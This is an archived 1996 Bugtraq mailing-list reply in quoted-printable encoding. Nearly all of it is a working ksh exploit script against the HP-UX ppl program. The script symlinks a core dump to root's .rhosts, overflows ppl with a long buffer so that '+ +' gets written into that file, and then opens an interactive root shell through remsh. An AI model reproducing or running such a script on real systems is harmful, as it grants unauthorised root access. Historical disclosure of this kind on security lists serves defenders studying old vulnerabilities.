[3588] in bugtraq
Re: Untitled
daemon@ATHENA.MIT.EDU (Stefan Zehl)
Sun Nov 3 14:17:34 1996
Date: Sun, 3 Nov 1996 17:53:13 GMT
Reply-To: Stefan Zehl <sec@wg.camelot.de>
From: Stefan Zehl <sec@wg.camelot.de>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In article <199611020927.CAA09747@command.com.inter.net>, Scriptors of =
DOOM wrote:
> Oh, if I had a hammer, I'd hammer in the morning, I'd hammer in the e=
vening,
> and I'd hammer me some Unix scripts.
Here it is, fresh from the Web :)
#!/bin/ksh
# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie
#HOST=3D'localhost'
#USER=3D`whoami`
HOST=3D"+"
USER=3D"+"
cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA=3D'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=3D`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i
CU,
Sec
--
Jeder Tag an dem du nicht l=E4chelst, ist ein verlorener Tag. (C. Chap=
lin)
Hiroshima '45 Tsjernobyl '86 Windows '95
Black holes are where GOD is dividing by zero